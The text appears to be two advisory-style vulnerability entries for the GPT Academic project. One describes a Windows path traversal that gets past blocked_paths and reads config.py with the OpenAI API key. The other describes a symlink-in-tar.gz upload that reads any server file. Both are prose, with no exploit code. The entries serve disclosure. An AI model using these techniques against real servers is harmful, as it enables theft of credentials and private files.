A path traversal vulnerability exists in binary-husky/gpt_academic at commit 679352d, which allows an attacker to bypass the blocked_paths protection and read the config.py file containing sensitive information such as the OpenAI API key. This vulnerability is exploitable on Windows operating systems by accessing a specific URL that includes the absolute path of the project.
GPT Academic provides interactive interfaces for large language models. In 3.91 and earlier, GPT Academic does not properly account for soft links. An attacker can create a malicious file as a soft link pointing to a target file, then package this soft link file into a tar.gz file and upload it. Subsequently, when accessing the decompressed file from the server, the soft link will point to the target file on the victim server. The vulnerability allows attackers to read all files on the server.